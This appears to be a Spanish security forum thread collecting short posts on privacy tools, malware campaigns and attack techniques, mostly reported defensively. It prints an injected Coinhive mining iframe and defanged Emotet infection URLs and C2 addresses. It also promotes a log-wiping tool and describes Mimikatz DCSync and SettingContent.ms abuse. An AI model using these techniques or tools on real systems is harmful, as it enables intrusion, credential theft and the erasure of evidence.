PrivaZer es una aplicación gratuita diseñada para permitirnos borrar todos estos archivos de nuestro ordenador, de forma segura, para que no puedan ser utilizados para poner en peligro nuestra privacidad. Podemos descargar esta aplicación sin coste alguno, siendo compatible con todas las versiones de Windows, desde XP hasta 10, y, además, estando optimizada para funcionar tanto en HDD como en SSD sin dañarlos al ejecutar las funciones de borrado seguro de datos. Podemos elegir si queremos descargar una versión portable o un instalador para dejarla instalada en el equipo.
Cómo funciona PrivaZer
Una vez descargada la aplicación la ejecutamos. Lo primero que veremos será un pequeño asistente en el que podremos configurar el funcionamiento de la aplicación, cargar un archivo de configuración previo o dejar al programa que se adapte automáticamente al ordenador. Aunque el programa es gratuito, existe una versión de "donación" que nos permite desbloquear algunas funcionalidades avanzadas, como el borrado automático de los datos.

En la ventana principal del programa vamos a poder elegir el tipo de dispositivo que queremos analizar. Además de nuestro PC, esta aplicación también nos va a permitir analizar discos duros externos, memorias USB, servidores NAS y otros dispositivos.



Una vez seleccionado el tipo de dispositivo que queremos analizar seleccionaremos el tipo de análisis que queremos realizar. Por defecto el programa realizará un análisis a fondo del ordenador y borrará todo lo que encuentre, aunque también le podemos decir que busque contenido concreto, como, por ejemplo, archivos temporales, historiales, etc.

Dentro de las opciones avanzadas del programa vamos a poder configurar algunos parámetros adicionales de esta herramienta, como la búsqueda de actualizaciones, las copias de seguridad del registro antes de hacer limpieza, si queremos habilitar los menús contextuales, distintas opciones de memoria e indexado y, además, los algoritmos de limpieza que queremos utilizar para borrar de forma segura los datos.

Una vez tengamos ya el programa configurado y hayamos seleccionado el tipo de contenido que queremos eliminar, pulsaremos sobre el botón "limpiar" para que el programa empiece a realizar sus funciones. Cuando finalice, ya se habrán borrado todos estos datos basura del equipo, protegiendo así mejor nuestra privacidad.

Web: https://privazer.com/download.php#compatibility
D.Directa: https://privazer.com/privazer_free.exe
Versión portable: https://privazer.com/PrivaZer.exe
Compatible : XP, Vista, Win7, Win8/8.1, Win10, 32bits & 64bits

Saludos.

El FTK Imager es una herramienta gratuita de la empresa AccessData, creadores entre otras soluciones forenses de Forensic Toolkit (FTK) una de las suites para análisis forense digital más usadas, pero también de la herramienta que les comparto hoy.



El FTK Imager es una solución muy completa y gratuita que nos permite sacar imágenes forenses de dispositivos de almacenamiento y la memoria ram, pero con varios plus interesantes, uno de los más útiles es el de aportar la posibilidad de montar las imágenes forenses en nuestro equipo como un disco más, o la de convertir entre distintos formatos de imágenes entre otros.

Una solucion recomendada y totalmente grauita

Link: https://mega.nz/#!4JxyRQLT!xirhlR4xEFPUBTn3N9IMTtYWsUSxzx2lkRWlLCNvZTE

Saludos.

Nuestro servicio AntiBotnet pone a tu disposición mecanismos para poder identificar si desde tu conexión a Internet (siempre que lo utilices dentro de España) se ha detectado algún incidente de seguridad relacionado con botnets, ofreciéndote información y enlaces a herramientas que te pueden ayudar en la desinfección de tus dispositivos.

Este servicio se ofrece de dos formas:

La primera se lleva a cabo mediante los operadores de servicios de Internet que colaboran con nosotros notificándote de los incidentes de seguridad que afectan a tu conexión. Si has recibido un mensaje de tu operador, consulta el código que te ha proporcionado y obtén la información directamente.
La segunda es mediante el uso de nuestras herramientas online.

Link: https://www.osi.es/es/servicio-antibotnet

Saludos.

CCleaner es un software de limpieza de Windows muy popular. Este último fue comprado recientemente por Avast!
Como resultado, se han realizado algunos cambios operativos con métodos de marketing más agresivos.
¡A veces se abren avisos para CCleaner o Avast! en forma de ventana emergente en la parte inferior derecha de la pantalla.

Este artículo explica cómo bloquear o eliminar los anuncios CCleaner.



Introducción a los anuncios de CCleaner

Aquí hay un ejemplo de los nuevos procesos utilizados al instalar y usar CCleaner.
Cuando instala CCleaner, Avast! se propone en la instalación.
Esta propuesta está marcada por defecto, si no tiene cuidado, ¡Avast! Entonces se instalará.
Si ya tiene un antivirus, terminará con dos antivirus instalados que pueden causar grandes problemas.



Más información: https://www.malekal.com/bloquer-supprimer-publicites-ccleaner/

Saludos.

Aquí hay un descifrador gratuito para #Sepsis #Ransomware (extensión: ". [<Correo electrónico>]. SEPSIS").
Enormes gracias a @FraMauronz por descifrarlo. 🙂

https://download.bleepingcomputer.com/demonslay335/SepsisDecrypter.zip



PD: El error de relleno en el malware significa que el último bloque está dañado, pero no puede recuperar los últimos 16 bytes de archivos.

Saludos.

Durante los últimos meses, la minería en el navegador ha seguido afectando a una gran cantidad de sitios web, y se basa predominantemente en la infame API de Coinhive. Documentamos varias campañas en este blog, en particular Drupalgeddon, donde los atacantes aprovechan las vulnerabilidades de los sistemas de administración de contenido (CMS) populares para comprometer sitios web y enviar cargas útiles tanto del lado del cliente como del servidor.

En las últimas semanas, nuestros rastreadores han catalogado varios cientos de sitios utilizando una variedad de CMS, todos ellos inyectados con el mismo código ofuscado que utiliza el enlace corto de Coinhive para realizar silenciosas unidades de disco duro. Al pivotar sobre este indicador de compromiso, pudimos identificar una infraestructura más grande que recibe tráfico de varios miles de sitios pirateados que actúan como puertas de entrada para redirigir el tráfico a un servidor central involucrado en la distribución de mineros de moneda estándar y web.



Como parte de nuestros rastreos regulares, buscamos redireccionamientos conocidos a sitios de interés y, últimamente, la mayoría se han relacionado con dominios de Coinhive. Detectamos cientos de dominios nuevos, todos los sitios web legítimos a los que se les inyectó una publicidad de código hexadecimal. Una vez decodificado, se muestra como un iframe invisible (1 × 1 píxel) a cnhv [.] Co / 3h2b2. Creemos que es parte de la misma campaña que fue expuesta por la gente de Sucuri a fines de mayo.

Código [Seleccionar] Expandir

<i frame src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></i frame>



Más información: https://blog.malwarebytes.com/threat-analysis/2018/07/obfuscated-coinhive-shortlink-reveals-larger-mining-operation/

Saludos.

Todos hemos visto correos electrónicos de aspecto incompleto o textos con enlaces maliciosos para hacer clic. Todavía hay personas que se inclinan por estos tipos más obvios de fraudes, sin embargo, los mensajes de estafa de phishing están diseñados para engañar. Usan métodos que parecen válidos o de algún asunto urgente, alentando a su víctima a entregar sus datos.

Campañas de phishing
Los intentos de phishing ocurren de muchas maneras, como por ejemplo:

Campañas de correo electrónico engañosas,
Alertas sospechosas de SMS (llamadas smishing),
Sitios web falsos diseñados para verse y sonar auténticos, y más.

Más información: https://blog.sucuri.net/2018/07/google-and-facebook-used-in-phishing-campaigns.html

Saludos.

Hasta qué punto es segura una huella dactilar y cómo podrían averiguar nuestra clave por la pulsación de teclas.

¿Es realmente seguro el uso de huella dactilar?
Existen muchas maneras de bloquear nuestro dispositivo. Podemos poner simplemente un código, también podemos optar por un patrón, huellas dactilares, etc. También podemos utilizar nuestro dedo para identificarnos en diferentes páginas y plataformas. Existen herramientas, extensiones para el navegador incluso, que pueden registrar nuestras huellas dactilares para ayudar a identificarnos.

Sin embargo un estudio reciente, según indican en Ghacks, refleja que estas herramientas no son tan seguras. Han realizado diferentes pruebas para determinar si podrían generar algún tipo de errores que afecten a la privacidad de los usuarios.

Más información: https://www.redeszone.net/2018/07/04/huella-dactilar-averiguar-nuestra-clave-pulsacion-teclas/

Saludos.

ARCHIVOS ASOCIADOS:

2018-07-02-Emotet-malspam-16-email-examples.txt.zip 4.8 kB (4.767 bytes)
2018-07-02-Emotet-malspam-16-email-examples.txt (15.796 bytes)
2018-07-02-Emotet-malspam-infection-traffic-in-AD-environment.pcap.zip 4.6 MB (4.620.312 bytes)
2018-07-02-Emotet-malspam-infection-traffic-in-AD-environment.pcap (5,303,730 bytes) / li>
2018-07-02-malware-associated-with-Emotet-infection.zip 541 kB (541,462 bytes)
2018-07-02-descargar-Word-doc-with-macro-for-Emotet.doc (232,192 bytes)
2018-07-02-Emotet-malware-binary-1-of-2.exe (208,896 bytes)
2018-07-02-Emotet-malware-binary-2-of-2.exe (203,776 bytes)
2018-07-02-Zeus-Panda-Banker-caused-by-Emotet.exe (223,744 bytes)
 
NOTAS:

Se generó esta infección en un entorno de Active Directory (AD), solo para ver si sucedía algo inusual.
Entonces, el tráfico en el pcap de hoy es un poco más desordenado que en mis publicaciones normales de blog.
Por lo que puedo decir, no sucedió nada inusual, aparte del tráfico de infección esperado.



LISTA DE BLOQUES DE TRÁFICO DE INTERNET
Los indicadores no son una lista de bloqueo. Si siente la necesidad de bloquear el tráfico web, le sugiero las siguientes URL y dominio:

hxxp: //all4mums.ru/Client/Past-Due-invoice/
hxxp: //chinaspycam.com/includes/languages/english/html_includes/En/DOC/Account-20064/
hxxp: //chouett-vacances.com/Payment-and-address/Invoice-70195027-070118/
hxxp: //cqfsbj.cn/DOC/Auditor-of-State-Notification-of-EFT-Deposit/
hxxp: //minami.com.tw/DOC/Account-55907/
hxxp: //nagoyamicky.com/cacheqblog/Payment-and-address/Invoice-3838804/
hxxp: //own-transport.com/pub/OVERDUE-ACCOUNT/tracking-number-and-invoice-of-your-order/
hxxp: //www.caglarturizm.com.tr/INVOICE-STATUS/Please-pull-invoice-47924/
hxxp: //www.customaccessdatabase.com/En/Purchase/HRI-Monthly-Invoice/
hxxp: //www.gracetexpro.com/Greeting-eCard/
hxxp: //www.jxprint.ru/Order/Payment/
hxxp: //www.legionofboomfireworks.com/Statement/Direct-Deposit-Notice/
hxxp: //www.marcoantoniocasares.com/Purchase/Pay-Invoice/
hxxp: //www.perezdearceycia.cl/wp-content/FILE/Invoice-23382229-070218/
hxxp: //www.sewamobilbengkulu.web.id/4th-July-2018/
hxxp: //zlc-aa.org/New-Order-Upcoming/588052/
hxxp: //clubvolvoitalia.it/r3z6/
hxxp: //ericconsulting.com/7I3eUNF/
hxxp: //www.goldenfell.ru/media/5DzF30jL/
hxxp: //jmamusical.jp/wordpress/wp-content/L8J0igh/
hxxp: //www.mobsterljud.se/VJkuLg/
hxxp: //74.79.26.193: 990 / whoami.php
canariasmotor.top



DATOS DE 16 EJEMPLOS DE CORREO ELECTRÓNICO DEL MALSPAM:

Recibido: de ([80.14.105.108])
Recibido: desde ([103.55.69.138])
Recibido: desde ([137.59.225.35])
Recibido: desde ([196.250.41.105])
Recibido: de ([221.163.32.101])
Recibido: de 10.0.0.0 ([119.148.37.228])
Recibido: desde 10.0.0.16 ([211.221.155.202])
Recibido: desde 10.0.0.20 ([117.240.219.106])
Recibido: desde 10.0.0.28 ([189.194.248.28])
Recibido: desde 10.0.0.28 ([220.249.72.99])
Recibido: desde 10.0.0.30 ([221.163.32.101])
Recibido: de 10.0.0.36 ([14.51.231.1])
Recibido: desde 10.0.0.40 ([187.144.210.26])
Recibido: desde 10.0.0.49 ([122.160.85.51])
Recibido: desde 10.0.0.59 ([90.86.57.136])
Recibido: desde 10.0.0.63 ([221.163.32.101])
 

REMITENTES ESPOSOS:

De: alexa.ballantine@gmail.com <[suplantando el envío de la dirección de correo electrónico]>
De: Jamacapq@sbcglobal.net <[falso enviando la dirección de correo electrónico]>
De: ramakrishna3sbc32@gmail.com <[dirección de correo electrónico de envío falso]>
De: Amanda Fisher <[suplantando el envío de la dirección de correo electrónico]>
De: Andrew Clough <[suplantando el envío de la dirección de correo electrónico]>
De: andy <[dirección de correo electrónico de envío falso]>
De: Beacon Systems <[falsificó el envío de la dirección de correo electrónico]>
De: CYNTHIA HARRY <[falsificó el envío de la dirección de correo electrónico]>
De: Darren Hamm <[falsificó el envío de la dirección de correo electrónico]>
De: Kira Holden <[falso enviando dirección de correo electrónico]>
De: Marina Eckert <[falsificó el envío de la dirección de correo electrónico]>
De: Mike Andrews <[falsificó el envío de la dirección de correo electrónico]>
De: Phil Gibson <[falsificó el envío de la dirección de correo electrónico]>
De: Priyanka Kapadia <[falsificó el envío de la dirección de correo electrónico]>
De: robert biggs <[dirección de correo electrónico de envío falso]>
De: Terry Nelson <[falsificó el envío de la dirección de correo electrónico]>
 

LÍNEAS DE SUJETOS:

Asunto: Los deseos del 4 de julio
Asunto: =? UTF-8? B? Vm9zIGZhY3R1cmVzIGltcGF5w6llcyBkdSAwMi8wNy8yMDE4ICMwMTUtNTgyMQ ==? =
Asunto: Darren Hamm 4 de julio Tarjeta de felicitación
Asunto: Cuenta final
Asunto: FACTURA INCORRECTA
Asunto: Número de factura 13915
Asunto: Número de factura 55057
Asunto: Factura # 3988726
Asunto: FACTURA FQOVN / 2773110/730 pendientes
Asunto: FACTURA EXCEPCIONAL XOJR / 7763411/6403
Asunto: envíe copia de la factura
Asunto: RE: INVOICE BIA pendiente / 066250/5423
Asunto: RTZM3-9044531941
Asunto: factura de ventas
Asunto: Diseño de asesoramiento de remesa separado: documento en papel A4
Asunto: Votre facture du 02 juillet Nr. 08296866





URLS DE MALSPAM PARA DESCARGAR EL DOCUMENTO INICIAL DE WORD:

hxxp: //all4mums.ru/Client/Past-Due-invoice/
hxxp: //chinaspycam.com/includes/languages/english/html_includes/En/DOC/Account-20064/
hxxp: //chouett-vacances.com/Payment-and-address/Invoice-70195027-070118/
hxxp: //cqfsbj.cn/DOC/Auditor-of-State-Notification-of-EFT-Deposit/
hxxp: //minami.com.tw/DOC/Account-55907/
hxxp: //nagoyamicky.com/cacheqblog/Payment-and-address/Invoice-3838804/
hxxp: //own-transport.com/pub/OVERDUE-ACCOUNT/tracking-number-and-invoice-of-your-order/
hxxp: //www.caglarturizm.com.tr/INVOICE-STATUS/Please-pull-invoice-47924/
hxxp: //www.customaccessdatabase.com/En/Purchase/HRI-Monthly-Invoice/
hxxp: //www.gracetexpro.com/Greeting-eCard/
hxxp: //www.jxprint.ru/Order/Payment/
hxxp: //www.legionofboomfireworks.com/Statement/Direct-Deposit-Notice/
hxxp: //www.marcoantoniocasares.com/Purchase/Pay-Invoice/
hxxp: //www.perezdearceycia.cl/wp-content/FILE/Invoice-23382229-070218/
hxxp: //www.sewamobilbengkulu.web.id/4th-July-2018/
hxxp: //zlc-aa.org/New-Order-Upcoming/588052/
URLS DE MACRO EN LA PALABRA DESCARGADA DOC PARA GRABAR UN EMOTET BINARIO:

hxxp: //clubvolvoitalia.it/r3z6/
hxxp: //ericconsulting.com/7I3eUNF/
hxxp: //www.goldenfell.ru/media/5DzF30jL/
hxxp: //jmamusical.jp/wordpress/wp-content/L8J0igh/
hxxp: //www.mobsterljud.se/VJkuLg/
TRÁFICO DE INFECCIÓN EMOTET:

156.67.209.70 puerto 80 - www.sewamobilbengkulu.web.id - GET / 4th-July-2018 / - devuelto Word doc
94.141.21.54 puerto 80 - clubvolvoitalia.it - ​​GET / r3z6 / - devuelto Emotet binario
92.27.116.104 puerto 80: intentos de conexiones TCP, pero ninguna respuesta del servidor (causada por Emotet)
24.173.127.246 puerto 443 - 24.173.127.246:443 - POST / - causado por Emotet
185.45.193.240 puerto 443 - canariasmotor.top - Tráfico HTTPS / SSL / TLS causado por Zeus Panda Banker
74.79.26.193 puerto 990 - 74.79.26.193:990 - GET /whoami.php - causado por Emotet
74.79.26.193 puerto 990 - 74.79.26.193:990 - POST / - causado por Emotet
 

MALWARE
MALWARE RECUPERADO DE MI ANFITRIÓN INFECTADO DE WINDOWS:

SHA256 hash: 4b3159ce83df623e093304b48ebf600a4932a2dc8067792b5dec5248d29c4ccf
Tamaño del archivo: 232,192 bytes
Nombre de archivo: wishes-July-4th.doc (nombre aleatorio en 4 de julio o Día de la Independencia)
Descripción del archivo: documento de Word descargado del enlace en uno de los correos electrónicos. Tiene macro para recuperar Emotet.
SHA256 hash: da4e4afbc50adfaa1b0e3d9288ec77346d9b4ebc6bc8538c7801ef4412b19b71
Tamaño del archivo: 208,896 bytes
Ubicación del archivo: C: \ Users \ [username] \ AppData \ Local \ Microsoft \ Windows \ [random file name] .exe
Descripción del archivo: Emotet malware binary descargado por macro en Word doc descargado
SHA256 hash: 47280253fad49f9f5ebacb420b30985fc68f22fd3a6e51f41571648ce77a8edd
Tamaño del archivo: 203,776 bytes
Ubicación del archivo: C: \ Users \ [username] \ AppData \ Local \ Microsoft \ [random file name] .exe
Descripción del archivo: binario actualizado Malware malware después de que el host se infectó por un tiempo
SHA256 hash: 2527c9eb597bd85c4ca2e7a6550cc7480dbb3129dd3d6033e66e82b0988ee061
Tamaño del archivo: 223,744 bytes
Ubicación del archivo: C: \ Users \ [username] \ AppData \ Roaming \ [ruta del directorio existente] \ [nombre de archivo aleatorio] .exe
Descripción del archivo: Zeus Panda Banker descargado por mi host infectado con Emotet
 

NOTAS FINALES
Una vez más, aquí están los archivos asociados:

https://www.malware-traffic-analysis.net/2018/07/02/2018-07-02-Emotet-malspam-16-email-examples.txt.zip 4.8 kB (4.767 bytes)
https://www.malware-traffic-analysis.net/2018/07/02/2018-07-02-Emotet-malspam-infection-traffic-in-AD-environment.pcap.zip 4.6 MB (4.620.312 bytes)
https://www.malware-traffic-analysis.net/2018/07/02/2018-07-02-malware-associated-with-Emotet-infection.zip 541 kB (541,462 bytes)
Los archivos Zip están protegidos por contraseña con la contraseña estándar. Si no lo sabe, mire la página "sobre" de este sitio web.

Log Killer es una herramienta para servidores [Linux / Windows]. Esta herramienta eliminará todos tus registros, solo descarga la herramienta y ejecútala en el servidor; si tu SO del servidor es Windows, descarga el archivo por lotes pero, si tu servidor Linux, entonces debes ejecutar el script php.





Linux:



[youtube=640,360]https://youtu.be/_5wpKYaJQko[/youtube]

Link: https://github.com/Rizer0/Log-killer

Saludos.

Aviso de seguridad de Ubuntu 3695-1:

Wen Xu descubrió que la implementación del sistema de archivos ext4 en el kernel de Linux no inicializaba correctamente el controlador de suma de comprobación crc32c. Un atacante local podría usar esto para causar una denegación de servicio. Se descubrió que el controlador cdrom en el kernel de Linux contenía una verificación de límites incorrecta. Un atacante local podría usar esto para exponer información sensible. También se abordaron otros temas diversos.

Más información: https://packetstormsecurity.com/files/148401

Saludos.

Mientras que la criptomoneda ha experimentado un gran crecimiento en el último año, el envío de criptocoins aún requiere que los usuarios envíen las monedas a direcciones largas y difíciles de recordar. Debido a esto, al enviar cryptocoins, muchos usuarios simplemente copian la dirección en la memoria de una aplicación y la pegan en otra aplicación que están utilizando para enviar las monedas.

Los atacantes reconocen que los usuarios están copiando y pegando las direcciones y han creado malware para aprovechar esto. Este tipo de malware, llamado CryptoCurrency Clipboard Hijackers, funciona monitorizando el portapapeles de Windows en busca de direcciones de criptomoneda, y si se detecta uno, lo intercambiará con una dirección que ellos controlen. A menos que un usuario verifique dos veces la dirección después de pegarla, las monedas enviadas irán a una dirección bajo control de los atacantes en lugar del destinatario previsto.

Si bien hemos cubierto secuestradores de portapapeles de criptomonedas en el pasado y no son nuevos, la mayoría de las muestras anteriores monitorearon entre 400 y 600 mil direcciones de criptomoneda. ¡Esta semana BleepingComputer notó una muestra de este tipo de malware que monitorea más de 2.3 millones de direcciones de criptomonedas!



Para ilustrar cómo este malware reemplazará las direcciones de criptomoneda encontradas en el portapapeles de Windows, hemos creado el siguiente video.

[youtube=640,360]https://youtu.be/Ty-_IjavYH4[/youtube]

Más información: https://www.bleepingcomputer.com/news/security/clipboard-hijacker-malware-monitors-23-million-bitcoin-addresses/

Saludos.

Un error en la aplicación predeterminada de mensajes de texto de Samsung es enviar fotos aleatorias a otras personas.



Enviar imágenes a otros es una de las funciones más básicas de un teléfono inteligente, pero cuando la aplicación de mensajes de texto de su teléfono comienza a sacar fotos al azar sin su conocimiento, usted tiene un problema.

Y desafortunadamente, de acuerdo con algunas quejas en Reddit y los foros oficiales de Samsung, parece que eso es exactamente lo que le sucedió a un puñado de usuarios de teléfonos Samsung, incluidos los propietarios de dispositivos de último modelo como el Galaxy Note 8 y el Galaxy S9.

Según los informes de los usuarios, el problema proviene de los mensajes de Samsung, la aplicación de mensajes de texto predeterminada en los dispositivos Galaxy, que (por motivos que no se han determinado) envía erróneamente imágenes almacenadas en los dispositivos a contactos aleatorios a través de SMS. Un usuario de Reddit incluso afirma que, en lugar de enviar una foto, Samsung Messages envió su galería de fotos completa a un contacto en el medio de la noche.

Afortunadamente para esa persona (o tal vez no), esas imágenes fueron enviadas a su compañero. Pero para otros que pueden haber enviado fotos a destinatarios más sensibles, como un socio comercial o jefe, el error podría dar a otras personas un vistazo no deseado a su vida privada.

La parte más aterradora de este error es que cuando los errores de mensajes de Samsung envían fotos a otras personas, según se informa, no deja ninguna evidencia de que lo haga, lo que significa que la gente puede no saber que sus fotos se han liberado hasta que sea demasiado tarde .

Actualmente, la teoría predominante sobre qué está causando este error es una interacción extraña entre los mensajes de Samsung y las recientes actualizaciones de perfil de RCS que se han implementado en los operadores, incluido T-Mobile. El objetivo de RCS (Rich Communication Services) es mejorar el obsoleto protocolo de SMS con nuevas funciones como compartir mejor los medios, escribir indicadores y leer recibos. El problema ahora es que parece que la manera en que se maneja RCS en los mensajes de Samsung es un desastre.

Cuando se le solicitó un comentario, Samsung le envió una declaración a Gizmodo, diciendo: "Estamos al tanto de los informes sobre este asunto y nuestros equipos técnicos lo están investigando. Los clientes interesados ​​pueden contactarnos directamente al 1-800-SAMSUNG. "También nos comunicamos con T-Mobile, que respondió remitiendo usuarios a Samsung, diciendo:" No es un problema de T-Mobile ".

Mientras tanto, para los propietarios de Samsung preocupados de que su teléfono pueda enviar fotos sensibles a contactos aleatorios, actualmente hay dos soluciones principales para esto. El primero es ir a la configuración de la aplicación de su teléfono y revocar la capacidad de los mensajes de Samsung para acceder al almacenamiento. Hasta que se publique una solución real, esto evitará que los Mensajes envíen fotos o cualquier otra cosa almacenada en su dispositivo, lo quiera o no quiera.

La otra opción es cambiar a una aplicación de mensajes de texto diferente, como Android Messages o Textra, que no parecen estar afectados por lo que está plagando la aplicación de mensajes de texto de Samsung (hasta ahora). Afortunadamente, este problema se resuelve rápidamente, porque hasta que lo haga, no hay garantía de privacidad para las personas que usan la aplicación de mensajes de texto predeterminada de Samsung.


Saludos.

VPNFilter es una amenaza dirigida a una amplia gama de enrutadores y dispositivos de almacenamiento conectado a la red (NAS). VPNFilter puede recopilar información confidencial y alterar el tráfico de la red a medida que pasa a través de un enrutador infectado, además de hacer que el enrutador no se pueda utilizar. El malware también puede sobrevivir a un reinicio del enrutador.

Symantec ofrece esta herramienta gratuita en línea que realiza una verificación rápida para determinar si su enrutador puede verse afectado por VPNFilter.

La herramienta en línea comprueba si su dispositivo ha sido comprometido por un componente específico utilizado por VPNFilter, conocido como el plugin ssler. Si esta herramienta encuentra que su enrutador no está infectado con el complemento ssler, su enrutador aún puede verse comprometido por otras amenazas o componentes de VPNFilter. VPNFilter afecta a una amplia gama de enrutadores y una lista de enrutadores vulnerables está disponible en nuestro blog sobre este malware.

Qué hacer si estás infectado:

Si le preocupa que su enrutador esté infectado por VPNFilter, le recomendamos realizar los siguientes pasos en orden. Consulte la documentación de su dispositivo para obtener detalles específicos sobre cómo realizar estos pasos:

Realice un restablecimiento completo de su enrutador para restaurar su configuración de fábrica. Primero guarde la configuración de su enrutador, ya que necesitará reconfigurar su enrutador después de este paso.

Apague y reinicie el enrutador. Tenga en cuenta que simplemente reiniciar su enrutador sin realizar antes el restablecimiento de fábrica puede no eliminar VPNFilter.

Cambie la contraseña de administrador predeterminada para su enrutador a una contraseña más segura. Si es posible, desconecte su enrutador de Internet público mientras realiza este paso.

Aplique los últimos parches y actualizaciones para su enrutador.

Link: http://www.symantec.com/filtercheck/

Saludos.

Uno de los vectores de infección más comunes y efectivos, especialmente para empresas, es el uso de documentos maliciosos de Office. Solo este año, fuimos testigos de dos días cero para Flash y el motor de VBScript, que primero se incorporaron a los documentos de Office antes de obtener una adopción más amplia en los kits de exploits web.

Además de aprovechar vulnerabilidades de software, los atacantes abusan regularmente de las características normales de Office, como macros, o de otras más oscuras como Dynamic Data Exchange (DDE) y, por supuesto, ataques de enlace e incrustación de objetos (OLE), que también pueden combinarse con exploits . Los administradores del sistema pueden endurecer los puntos finales mediante la desactivación de ciertas funciones en toda la empresa, por ejemplo, para frustrar ciertos esquemas de ingeniería social que intentan engañar a los usuarios para que habiliten una macro maliciosa. En versiones recientes de Office, Microsoft también está bloqueando la activación de objetos considerados de alto riesgo, según una lista de extensiones que se pueden personalizar a través de la Política de grupo.

Pero un descubrimiento reciente del investigador de seguridad Matt Nelson, muestra que se puede aprovechar otro vector de infección, uno que elude la configuración de protección actual e incluso la nueva tecnología de Reducción de Superficie de Ataque de Microsoft. Al incorporar archivos de configuración especialmente diseñados en un documento de Office, un atacante puede engañar a un usuario para que ejecute código malicioso sin más advertencias o notificaciones.



El formato de archivo, específico para Windows 10 llamado .SettingContent.ms, es esencialmente código XML que se utiliza para crear accesos directos al Panel de control. Esta característica se puede abusar porque uno de sus elementos (DeepLink) permite ejecutar cualquier binario con parámetros. Todo lo que un atacante debe hacer es agregar su propio comando usando Powershell.exe o Cmd.exe. Y el resto es historia.



Más información: https://blog.malwarebytes.com/threat-analysis/2018/07/new-macro-less-technique-used-distribute-malware/

Saludos.

Una nueva aplicación vuelve a poner a Facebook en el centro de las críticas respecto al mal uso de los datos de sus usuarios. Los que tienen un perfil hace una década podrán recordar el furor que fueron los tests de personalidad, en donde el usuario respondía unas preguntas y a cambio la plataforma te decía a qué jugador de fútbol te parecías o qué princesa de Disney eras.



Esta última es la que llamó la atención de Inti De Cukelaire, un experto en seguridad informática que expuso como la aplicación NameTests[.]com filtró datos de sus usuarios durante años con la vista gorda de la red social.

La plataforma acumulaba información de más de 120 millones de usuarios cada mes y, desde hace dos años, permitía que cualquiera pueda tener acceso a la información de los que iniciaron el test.

Apenas se abría el test, la app era capaz de hacer un barrido de la información privada, se hubieran dados permisos o no. El otro grave error de seguridad de la plataforma era que esos datos estaban disponibles en un archivo que podía consultarse o que se compartía con terceros a través de los sitios visitados por los usuarios.

Desde Facebook reconocieron el error y confirmaron que ya trabajaron para corregir la vulnerabilidad. "Para estar seguros, revocamos los tokens de acceso para todos los que se hayan registrado para usar esta aplicación. Entonces la gente tendrá que volver a autorizar la aplicación para poder seguir usándola", indicó la red social en una publicación.

El experto en seguridad informática que descubrió la falla creó un video explicando cómo funcionaba el error. Hasta el momento no hay evidencia que permita asegurar si la información expuesta por Nametests fue utilizada por otros y cuantá gente ya lo había descubierto al error. Para Ceukelaire, la falla es muy sencilla de detectar para especialistas.

Más información: http://www.businessinsider.com/nametestscom-may-have-exposed-facebook-data-of-120-million-users-2018-6

Saludos.

Escape de SHELLcatraz: ruptura de las capas restringidas de Unix:

Tutorial tipo slide, más información:

https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells

Saludos.

Este artículo tiene como objetivo explicar qué es exactamente el virus .KRAB y luego ayudar a las víctimas a eliminar el ransomware y restaurar potencialmente los archivos cifrados.

.KRAB Files Virus Cómo eliminar GANDCRAB V4 y restaurar los datos sensorstechforum

El virus .KRAB es una nueva versión del armario de datos ransomware de GandCrab. La amenaza se ha lanzado recientemente en campañas de ataque activo contra usuarios de computadoras en todo el mundo. Su nombre es un derivado de la extensión de archivo específico .KRAB colocado al final de todos los archivos dañados. Luego del cifrado, este nuevo GANDCRAB V4 arroja una nota de rescate para instruir a las víctimas sobre cómo pagar la clave única de descifrado que recuperará los archivos .KRAB. Al llegar al final del artículo, sabrá cómo eliminar la amenaza y encontrará algunos métodos alternativos de recuperación de datos que pueden ayudarlo a restaurar archivos .KRAB sin pagar el rescate.



Nombre: .KRAB Files Virus

Tipo: Ransomware, Cryptovirus

Breve descripción: Versión 4 de la familia del virus del rescate de GandCrab. cifra sus archivos y le pide que pague un rescate por una clave de recuperación única.

Síntomas: Los archivos cifrados se renombran con la extensión .KRAB. Permanecen inutilizables hasta que se utiliza una solución de recuperación eficiente. Se deja caer una nota de rescate, llamada CRAB-DECRYPT.txt en su PC.

Método de distribución: Correo electrónico no deseado, archivos adjuntos de correo electrónico

Herramienta de detección: Consulte si su sistema ha sido afectado por Virus .KRAB Files

Este producto escanea los sectores de unidades para recuperar los archivos perdidos y es posible que no recupere el 100% de los archivos cifrados, pero solo unos pocos, dependiendo de la situación y de si ha reformateado la unidad.:

https://sensorstechforum.com/stellar-phoenix-windows-data-recovery-software-review/

Saludos.

Introducción: extracción de datos de contraseña de usuario con Mimikatz DCSync:

Mimikatz proporciona una variedad de formas para extraer y manipular credenciales, pero probablemente una de las formas más útiles y atemorizantes sea utilizar el comando DCSync. Este ataque simula el comportamiento de un controlador de dominio y le pide a otros controladores de dominio que repliquen información utilizando el Protocolo remoto de servicio de replicación de directorios (MS-DRSR). Básicamente, le permite pretender ser un controlador de dominio y solicitar datos de contraseña de usuario. Lo que es más importante, esto se puede hacer sin ejecutar ningún código en un controlador de dominio, a diferencia de las otras formas en que Mimikatz extraerá los datos de contraseña. Esto puede ser utilizado por los atacantes para obtener el hash NTLM de cualquier cuenta, incluida la cuenta KRBTGT, que permite a los atacantes crear Boletos Dorados. La parte más difícil de este ataque es que aprovecha una función válida y necesaria de Active Directory, por lo que no se puede desactivar o deshabilitar.

¿Quién puede realizar un ataque DCSync?
Realizar una DCSync es bastante simple. El único requisito previo para preocuparse es que tenga una cuenta con derechos para realizar la replicación del dominio. Esto está controlado por los permisos de Replicación de cambios establecidos en el dominio. Tener el permiso Duplicar cambios y Duplicar cambios en el directorio le permitirá realizar este ataque.



De forma predeterminada, esto se limita a los grupos Administradores de dominio, Administradores de empresa, Administradores y Controladores de dominio. Si desea buscar rápidamente a cualquier usuario que pueda realizar el ataque DCSync fuera de estos permisos predeterminados, la siguiente secuencia de comandos lo ayudará. Esto enumerará todos los permisos de dominio para cualquier dominio y encontrará todos los permisos otorgados con un RID superior a 1000, que excluirá todos los permisos predeterminados.



Running this will output an entry for each permission given to a user or group who probably shouldn't be there:



Más información: https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/

Saludos.

En este video demuestran la posibilidad de reutilizar una shellcode existente y así bypasear el antivirus (en concreto Windows Defender):

[youtube=640,360]https://youtu.be/dRkQiANI138[/youtube]

Saludos.

